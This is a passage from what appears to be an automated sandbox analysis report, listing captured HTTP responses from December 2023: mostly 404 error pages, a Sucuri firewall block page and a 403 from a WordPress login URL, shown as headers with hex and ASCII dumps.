6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 31 63 63 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 6d 65 64 69 75 6d 2d 74 65 78 74 22 3e 54 68 69 73 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 74 72 79 69 6e 67 20 74 6f 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:55 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://adm-works.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a Data Ascii: 16<!DOCTYPE html><html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:57 GMTServer: ApacheLast-Modified: Thu, 26 Jul 2007 15:09:38 GMTETag: "8d7ff8d4-2b5-4362c03e5f083"Accept-Ranges: bytesContent-Length: 693Content-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.19.9.1Date: Fri, 22 Dec 2023 20:14:57 GMTContent-Type: text/htmlContent-Length: 575Connection: keep-aliveLast-Modified: Wed, 05 Oct 2011 15:41:30 GMTETag: "23f-4ae8f0ab47e80"Data Raw: 3c 64 69 76 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 3c 62 3e 34 30 34 3a 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 62 3e 0a 20 20 20 20 20 20 20 20 3c 62 72 2f 3e 0a 20 20 20 20 20 20 20 20 54 68 69 73 20 65 72 72 6f 72 20 69 73 20 67 65 6e 65 72 61 74 65 64 20 77 68 65 6e 20 74 68 65 72 65 20 77 61 73 20 6e 6f 20 77 65 62 20 70 61 67 65 20 77 69 74 68 20 74 68 65 20 6e 61 6d 65 20 79 6f 75 20 73 70 65 63 69 66 69 65 64 20 61 74 20 74 68 65 20 77 65 62 20 73 69 74 65 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 3c 62 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 54 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 20 73 75 67 67 65 73 74 69 6f 6e 73 3a 0a 20 20 20 20 20 20 20 20 3c 2f 62 3e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 45 6e 73 75 72 65 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 69 6e 6b 69 6e 67 20 74 6f 20 65 78 69 73 74 73 20 69 6e 20 74 68 65 20 63 6f 72 72 65 63 74 20 66 6f 6c 64 65 72 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 43 68 65 63 6b 20 79 6f 75 72 20 66 69 6c 65 20 6e 61 6d 65 20 66 6f 72 20 63 61 73 65 20 73 65 6e 73 69 74 69 76 69 74 79 20 2e 20 49 6e 64 65 78 2e 68 74 6d 20 69 73 20 6e 6f 74 20 74 68 65 20 73 61 6d 65 20 61 73 20 69 6e 64 65 78 2e 68 74 6d 21 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 64 69 73 61 62 6c 65 20 61 6e 79 20 72 65 77 72 69 74 65 20 72 75 6c 65 73 20 62 79 20 72 65 6e 61 6d 69 6e 67 20 79 6f 75 72 20 2e 68 74 61 63 63 65 73 73 20 66 69 6c 65 20 69 66 20 69 74 20 65 78 69 73 74 73 2e 0a 20 20 20 20 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a Data Ascii: <div> <p> <b>404: Page not found</b> <br/> This error is generated when there was no web page with the name you specified at the web site. </p> <p> <b> Troubleshooting suggestions: </b> </p> <p> Ensure the page you are linking to exists in the correct folder. </p> <p> Check your file name for case sensitivity . Index.htm is not the same as index.htm! </p> <p> Temporarily disable any rewrite rules by renaming your .htaccess file if it exists. </p></div>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 22 Dec 2023 20:14:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingVary: Accept-EncodingSet-Cookie: apbct_timestamp=1703276096; path=/; HttpOnly; SameSite=LaxExpires: Fri, 01 Jan 71 00:00:00 +0000Pragma: no-cacheX-Powered-By: WP EngineX-Cacheable: NO:403Cache-Control: max-age=0, must-revalidate, privateX-Cache: MISSX-Pass-Why: wp-adminContent-Encoding: gzipCF-Cache-Status: DYNAMICSet-Cookie: apbct_site_landing_ts=1703276096; path=/; HttpOnly; SameSite=LaxSet-Cookie: apbct_page_hits=1; path=/; HttpOnly; SameSite=LaxSet-Cookie: apbct_cookies_test=%257B%2522cookies_names%2522%253A%255B%2522apbct_timestamp%2522%252C%2522apbct_site_landing_ts%2522%252C%2522apbct_page_hits%2522%255D%252C%2522check_value%2522%253A%2522d42136a717107bf800630d3d98c79970%2522%257D; path=/; HttpOnly; SameSite=LaxSet-Cookie: apbct_urls=%7B%22jaydien.com%2Fwp-login.php%22%3A%5B1703276096%5D%7D; expires=Mon, 25 Dec 2023 20:14:56 GMT; Max-Age=259200; path=/; domain=jaydien.com; HttpOnly; SameSite=LaxSet-Cookie: apbct_site_referer=UNKNOWN; expires=Mon, 25 Dec 2023 20:14:56 GMT; Max-Age=259200; path=/; domain=jaydien.com; HttpOnly; SameSite=LaxSet-Cookie: __cf_Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:57 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-104.ec2.internalX-Request-Id: 56a4787a-8891-40e1-9da8-f9463ed240dbData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:57 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-133.ec2.internalX-Request-Id: 71c3f190-104c-4006-8faf-8c8251893cbfData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:57 GMTServer: ApacheUpgrade: h2Connection: UpgradeLast-Modified: Mon, 06 Jun 2005 08:43:43 GMTETag: "31a-3f8dbb37d6dc0;45d2231770ec0Accept-Ranges: bytesContent-Length: 794Content-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 2e 73 74 79 6c 65 33 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 43 43 30 30 30 30 3b 0a 7d 0a 2e 73 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 43 43 43 43 43 43 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 45 43 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 30 70 78 3b 0a 7d 0a 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 0a 3c 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 79 6c 65 33 22 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 3c 2f 68 32 3e 0a 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 38 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 77 69 64 74 68 3d 22 34 36 30 22 3e 0a 3c 74 62 6f 64 79 3e 3c 74 72 3e 3c 74 64 20 63 6c 61 73 73 3d 22 73 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 62 6f 64 79 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>404 Not Found</title><style type="text/css"><!--.style3 { font-family: Verdana, Arial, Helvetica, sans-serif; color: #CC0000;}.s { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11px; font-weight: normal;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Fri, 22 Dec 2023 20:14:57 GMTcontent-type: text/html; charset=iso-8859-1content-length: 196server: Apachex-iplb-request-id: 668198D4:ED94_D5BA2113:0050_6585EE41_111B4:3CCDx-iplb-instance: 51814Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.19.9.1Date: Fri, 22 Dec 2023 20:14:57 GMTContent-Type: text/htmlContent-Length: 575Connection: keep-aliveLast-Modified: Wed, 05 Oct 2011 15:41:30 GMTETag: "23f-4ae8f0ab47e80"Data Raw: 3c 64 69 76 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 3c 62 3e 34 30 34 3a 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 62 3e 0a 20 20 20 20 20 20 20 20 3c 62 72 2f 3e 0a 20 20 20 20 20 20 20 20 54 68 69 73 20 65 72 72 6f 72 20 69 73 20 67 65 6e 65 72 61 74 65 64 20 77 68 65 6e 20 74 68 65 72 65 20 77 61 73 20 6e 6f 20 77 65 62 20 70 61 67 65 20 77 69 74 68 20 74 68 65 20 6e 61 6d 65 20 79 6f 75 20 73 70 65 63 69 66 69 65 64 20 61 74 20 74 68 65 20 77 65 62 20 73 69 74 65 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 3c 62 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 54 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 20 73 75 67 67 65 73 74 69 6f 6e 73 3a 0a 20 20 20 20 20 20 20 20 3c 2f 62 3e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 45 6e 73 75 72 65 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 69 6e 6b 69 6e 67 20 74 6f 20 65 78 69 73 74 73 20 69 6e 20 74 68 65 20 63 6f 72 72 65 63 74 20 66 6f 6c 64 65 72 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 43 68 65 63 6b 20 79 6f 75 72 20 66 69 6c 65 20 6e 61 6d 65 20 66 6f 72 20 63 61 73 65 20 73 65 6e 73 69 74 69 76 69 74 79 20 2e 20 49 6e 64 65 78 2e 68 74 6d 20 69 73 20 6e 6f 74 20 74 68 65 20 73 61 6d 65 20 61 73 20 69 6e 64 65 78 2e 68 74 6d 21 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 64 69 73 61 62 6c 65 20 61 6e 79 20 72 65 77 72 69 74 65 20 72 75 6c 65 73 20 62 79 20 72 65 6e 61 6d 69 6e 67 20 79 6f 75 72 20 2e 68 74 61 63 63 65 73 73 20 66 69 6c 65 20 69 66 20 69 74 20 65 78 69 73 74 73 2e 0a 20 20 20 20 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a Data Ascii: <div> <p> <b>404: Page not found</b> <br/> This error is generated when there was no web page with the name you specified at the web site. </p> <p> <b> Troubleshooting suggestions: </b> </p> <p> Ensure the page you are linking to exists in the correct folder. </p> <p> Check your file name for case sensitivity . Index.htm is not the same as index.htm! </p> <p> Temporarily disable any rewrite rules by renaming your .htaccess file if it exists. </p></div>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:57 GMTServer: ApacheUpgrade: h2Connection: UpgradeLast-Modified: Mon, 06 Jun 2005 08:43:43 GMTETag: "31a-3f8dbb37d6dc0;45d2231770ec0Accept-Ranges: bytesContent-Length: 794Content-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 2e 73 74 79 6c 65 33 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 43 43 30 30 30 30 3b 0a 7d 0a 2e 73 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 43 43 43 43 43 43 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 45 43 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 30 70 78 3b 0a 7d 0a 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 0a 3c 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 79 6c 65 33 22 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 3c 2f 68 32 3e 0a 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 38 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 77 69 64 74 68 3d 22 34 36 30 22 3e 0a 3c 74 62 6f 64 79 3e 3c 74 72 3e 3c 74 64 20 63 6c 61 73 73 3d 22 73 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 62 6f 64 79 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>404 Not Found</title><style type="text/css"><!--.style3 { font-family: Verdana, Arial, Helvetica, sans-serif; color: #CC0000;}.s { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11px; font-weight: normal;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:57 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeLast-Modified: Fri, 30 Sep 2022 11:47:19 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4677Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 28 a5 1e fc 61 7b e3 38 6a 6f 8e 17 74 1e c2 45 49 2e fb b6 b1 d1 1f 36 b2 b2 ac 14 f6 71 5e 09 9d 3e 04 59 8a 5a a9 b3 ae 51 08 8e 8d e9 fc 48 ac 5d f3 72 42 69 73 5f 89 34 95 3a 1f 1e 8c 4a 61 72 a9 f9 21 63 0f fb 99 28 a5 6a 86 05 aa 29 3a 99 88 d1 9f cb 7b 7b de 64 21 35 9a fb ee ce cf 07 d5 1c 44 ed 68 34 93 a9 2b 86 bf fe f2 6b 35 df 79 03 f6 1c 55 ec f7 fd 44 24 77 b9 a1 5a a7 7d 59 8a 1c 87 b5 51 4f 9f 2c f5 86 35 1b f1 49 3e ff 69 36 f8 a3 ca 9f 3c 1b ad 5d 32 58 a1 70 43 4d dd d3 c6 e4 02 65 5e b8 e1 e1 57 68 94 32 fd 2e 1a 7c 7e 90 cb 6c 27 89 f6 a7 df 7c 83 fa 76 2c ec e5 c2 91 99 90 73 54 de 57 64 a5 93 a4 19 47 09 27 a7 38 52 98 b9 e1 d1 0b 46 c9 14 f1 00 ff fe 4f 00 e7 f3 f9 fd da e1 45 ac c7 3e 99 a3 17 ff c6 df 87 fc 38 82 2e b1 90 56 fb d5 3f 5c a4 f7 f5 09 7e 09 b5 5b 9f e2 4b d5 17 4a e6 7a 98 f0 16 9a ef 70 a0 83 83 3d 34 86 4c 42 29 de 87 e2 59 f9 0f 1c 1e 79 ae e1 75 d6 46 f9 eb c1 c1 b7 e2 4d 84 de ae e6 01 ff fb d6 eb 05 59 87 e9 a4 b9 df 1e bf 62 f7 f3 f3 05 3b eb 1a 85 43 e9 d8 83 64 b4 35 f1 5b 07 26 54 57 a4 ef 13 52 64 86 7b 2f 5f 1d 1c 6c 0e fb 79 e7 b0 6f 04 cf d1 59 27 0c 2b 02 f1 c5 11 47 87 3b 47 fc 8b fe af 8d 5c 84 e0 fd 3f 7a fe c5 4a 4c c8 39 2a 19 e5 7e 22 92 bb dc 50 ad d3 be 2c 45 8e c3 da a8 a7 4f a2 24 97 7d db d8 28 ac d9 88 4f b6 57 06 b9 cc 9e 3c 1b ad dd 32 58 21 b7 53 53 f7 b4 51 c8 a2 d5 72 78 fc ed e5 cc c4 e7 4f ab fd 85 1e 78 1e 22 0e df 23 a8 44 9a 4a 9d 0f e1 b0 4d be fd 19 41 a2 50 98 21 33 2d be 75 9a 48 12 32 a9 e4 36 ac c2 81 17 07 3f 8e a0 95 01 bf 3c 67 ec 11 94 52 f7 3b 31 3c ad 5d ea 98 1d 80 a8 1d 8d c0 e1 dc f5 39 c6 9c d7 12 06 47 f3 dd 24 a0 56 70 bf 8e a3 30 73 df 8f 42 bb 51 1e 3d fa 66 04 25 61 db 90 e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Fri, 22 Dec 2023 20:14:57 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 55 90 41 4f c3 30 0c 85 ef fd 15 66 67 98 07 da 31 8a 04 6b 27 26 95 31 a1 ec c0 31 2c 86 44 ca 92 91 b8 4c fd f7 24 1d 12 70 7c f6 f3 e7 67 8b ab f6 79 a5 5e 77 1d 3c aa a7 1e 76 fb 87 7e b3 82 d9 0d e2 a6 53 6b c4 56 b5 97 ce dd 7c 81 d8 6d 67 b2 11 96 8f 5e 0a 4b da 14 c1 8e 3d c9 e5 62 09 db c8 b0 8e 43 30 02 2f c5 46 e0 64 12 6f d1 8c 75 ee 56 fe f1 14 d5 88 93 54 96 20 d1 e7 40 99 c9 c0 fe a5 87 b3 ce 10 0a eb bd b2 20 06 60 eb 32 64 4a 5f 94 e6 02 4f d3 d8 bd 31 8e 5d 0c da fb f1 1a 34 fc 0b d0 50 4a 31 4d 20 0a 87 82 61 4a 05 7e b6 ce 13 70 1a 5d f8 00 8e 30 64 02 1d a0 ab e6 36 1e 86 23 05 ae 75 ab 83 a9 c6 df 64 3f 6b 71 3a a4 5c 55 1f d0 7c 03 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efUAO0fg1k'&11,DL$p\|gy^w<v~SkV\|mg^K=bC0/FdouVT @ `2dJ_O1]4PJ1M aJ~p]0d6#ud?kq:\U\|Y<;0
